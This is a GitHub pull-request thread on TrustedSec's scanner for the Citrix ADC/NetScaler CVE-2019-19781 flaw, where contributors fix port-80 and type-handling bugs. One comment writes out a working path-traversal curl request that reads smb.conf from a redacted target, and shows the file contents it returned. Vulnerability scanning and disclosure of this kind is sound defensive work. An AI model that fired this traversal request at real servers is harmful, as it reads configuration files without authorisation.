search

trustedsec / cve-2019-19781

This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
Other
570 stars 127 forks source link

Update cve-2019-19781_scanner.py #3

Closed Zawadidone closed 4 years ago

Zawadidone commented 4 years ago

https will not work on port 80: ssl.SSLError: [SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:1076)

req.content should be req._content or req.text: 

if ("global") in req.content: # each smb.conf will contain a [global] variable
TypeError: a bytes-like object is required, not 'str'
trustedsec commented 4 years ago

Are you trying to test the scanner on http? 80 is reserved for that. It’s pure https since netscalers are only installed via https even with a self signed cert.

trustedsec commented 4 years ago

Appreciate the PR, I put a check for port 80 instead. Based on the Citrix documentation you can't install NetScalers in an HTTP sense so this wouldn't be applicable. I put a check to use HTTPS and not default to port 80.

Zawadidone commented 4 years ago

Thanks that was the problem I encountered.

Zawadidone commented 4 years ago

But still weird that the documentation says that port 80 is not possible, but this still works:

curl -k http://REDACTED:80/vpn/../vpns/cfg/smb.conf
[global]
        encrypt passwords = yes
        name resolve order = lmhosts wins host bcast
trustedsec commented 4 years ago

That's pretty crazy. Good find.. I've added so you can scan port 80 now. I also did a big update that allows you to scan CIDR notations also. Thanks for confirming and checking.

Zawadidone commented 4 years ago

Thanks for the update!